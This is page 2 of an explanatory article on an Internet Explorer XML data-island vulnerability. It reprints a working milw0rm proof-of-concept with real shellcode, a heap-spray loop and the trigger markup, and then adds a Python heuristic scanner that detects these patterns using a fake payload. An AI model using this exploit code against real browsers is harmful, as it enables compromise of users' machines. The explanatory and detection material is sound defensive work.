Page 2 of 3

This code snippet was published on the exploit web site milw0rm.com and illustrates how the exploit works.
First, some preamble HTML markup.
<html>
<div id="replace">x</div>
<script>
Now the program script itself; the shellcode string holds the machine-code instructions that start a new process, running calc.exe.
Note: I have broken this line up for readability, but you ought to ensure it is all one continuous line when pasting it into a text editor:
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a
%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe
%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2
%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3
%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81
%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f
%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba
%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e
%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c
%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
The next piece of script code sprays the heap: it doubles a short padding string until it exceeds 0xd0000 characters, then stores 100 copies of that padding followed by the shellcode, so that the memory address the browser is later tricked into jumping to is likely to land inside one of those copies and execution slides into the shellcode:
var spray = unescape("%u0a0a%u0a0a");
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
And here is the exploit trigger; the following XML markup is handled incorrectly by unpatched versions of Internet Explorer and causes the browser to pass control to the memory address covered by the sprayed array, and therefore to execute the program instructions it contains.
This too should be one continuous line in a text editor:
xmlcode = "<XML ID=I><X><C><![CDATA[<image
SRC=http://ਊਊ.example.com>]]></C>
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML><XML ID=I></XML><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script>
</html>
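Seen from the defender's side, the two pieces above (the heap-spray loop and the XML data-island binding) leave recognisable fingerprints in page content that a proxy, mail gateway or sandbox can look for. The following is an added example, not code from the article or from milw0rm: a small heuristic scanner that decodes `unescape("%uXXXX…")` runs into the bytes they occupy in memory, flags short repeating padding seeds, string-doubling loops with a large `.length` target, opaque shellcode-sized blobs, a `SPAN` bound to an `XML` data island with `DATAFORMATAS=HTML`, and dynamic `innerHTML` injection, and combines them into a verdict. The two sample pages, the regular expressions and the thresholds are all constructed for the example; the "suspicious" sample uses a fake, non-functional byte blob in place of real shellcode.

```python
"""Heuristic scanner for heap-spray and IE XML data-island trigger patterns.
Added example; samples, patterns and thresholds are constructed, not from the article."""
import re

# unescape("...") containing only %uXXXX escapes (whitespace tolerated, as in the article's line-wrapped listing)
UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:\s*%u[0-9a-fA-F]{4})+)\s*"\s*\)')
# self-doubling string:  s += s;
DOUBLING_RE = re.compile(r'\b(\w+)\s*\+=\s*\1\s*;')
# loop bound on string length:  x.length < 0xd0000
LENGTH_RE = re.compile(r'\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)')
# SPAN data-bound to an XML island and rendered as HTML
DATABIND_RE = re.compile(r'<SPAN\b[^>]*\bDATASRC\s*=\s*#?(\w+)[^>]*\bDATAFORMATAS\s*=\s*HTML', re.I)
XML_ISLAND_RE = re.compile(r'<XML\s+ID\s*=\s*(\w+)\s*>', re.I)
INNERHTML_RE = re.compile(r'\.innerHTML\s*=\s*\w+\s*;')


def decode_percent_u(text):
    """Decode a run of JavaScript %uXXXX escapes into the bytes the string occupies
    in memory (UTF-16 code units, little-endian), which is how the spray lands on the heap."""
    out = bytearray()
    for unit in re.findall(r'%u([0-9a-fA-F]{4})', text):
        out += int(unit, 16).to_bytes(2, 'little')
    return bytes(out)


def smallest_period(blob):
    """Length of the shortest unit that repeats to form blob (len(blob) if none)."""
    n = len(blob)
    for p in range(1, n // 2 + 1):
        if n % p == 0 and blob == blob[:p] * (n // p):
            return p
    return n


def scan(html):
    """Return {'verdict': 'suspicious'|'clean', 'findings': [...]} for one HTML document."""
    findings = []
    for m in UNESCAPE_RE.finditer(html):
        blob = decode_percent_u(m.group(1))
        period = smallest_period(blob)
        if len(blob) >= 4 and period <= 2:            # e.g. %u0a0a%u0a0a -> 0a 0a 0a 0a
            findings.append(f"spray seed: {period}-byte unit {blob[:period].hex()} repeated")
        elif len(blob) >= 64:                           # too long for a label, too random for padding
            findings.append(f"opaque escaped blob of {len(blob)} bytes (possible shellcode)")
    lengths = [int(v, 16) if v.lower().startswith("0x") else int(v) for v in LENGTH_RE.findall(html)]
    if DOUBLING_RE.search(html) and any(n >= 0x10000 for n in lengths):
        findings.append(f"heap spray growth loop: string doubled until length >= {max(lengths):#x}")
    islands = {i.upper() for i in XML_ISLAND_RE.findall(html)}
    for m in DATABIND_RE.finditer(html):
        if m.group(1).upper() in islands:
            findings.append(f"SPAN bound to XML data island #{m.group(1)} with DATAFORMATAS=HTML")
            break
    if findings and INNERHTML_RE.search(html):
        findings.append("markup injected dynamically via innerHTML")
    return {"verdict": "suspicious" if len(findings) >= 3 else "clean", "findings": findings}


# Constructed samples. FAKE_BLOB is a deterministic non-repeating placeholder, not shellcode.
FAKE_BLOB = "".join(f"%u{(i * 40503 + 17) & 0xFFFF:04x}" for i in range(48))
SUSPICIOUS_PAGE = f'''<html><div id="replace">x</div><script>
var shellcode = unescape("{FAKE_BLOB}");
var spray = unescape("%u0a0a%u0a0a");
do {{ spray += spray; }} while (spray.length < 0xd0000);
memory = new Array();
for (i = 0; i < 100; i++) memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://placeholder.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script></html>'''
BENIGN_PAGE = '''<html><script>
var title = unescape("%u0048%u0069");   // "Hi"
var pad = "ab"; pad += pad;
</script><span id="out"></span></html>'''

if __name__ == "__main__":
    for name, page in (("suspicious", SUSPICIOUS_PAGE), ("benign", BENIGN_PAGE)):
        result = scan(page)
        print(name, "->", result["verdict"])
        for f in result["findings"]:
            print("   ", f)
```

The individual heuristics are weak on their own (a benign page may well double a string or decode a `%u` label), so the verdict requires several of them to coincide, which is the combination the snippet above exhibits: a repeating padding seed, a doubling loop with a heap-sized bound, a long opaque blob and the data-island binding rendered as HTML. Decoding the escapes as little-endian UTF-16 matters because that is the byte layout the spray places on the heap.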
Of course, while this example does nothing more harmful than launch the calculator, it has been noted that the vulnerability has been used elsewhere to install Trojan horse programs.
Microsoft offers instructions on how to mitigate the effectiveness of this vulnerability and, in doing so, indirectly espouses the Linux viewpoint on secure computing. Let me explain.
CONTINUED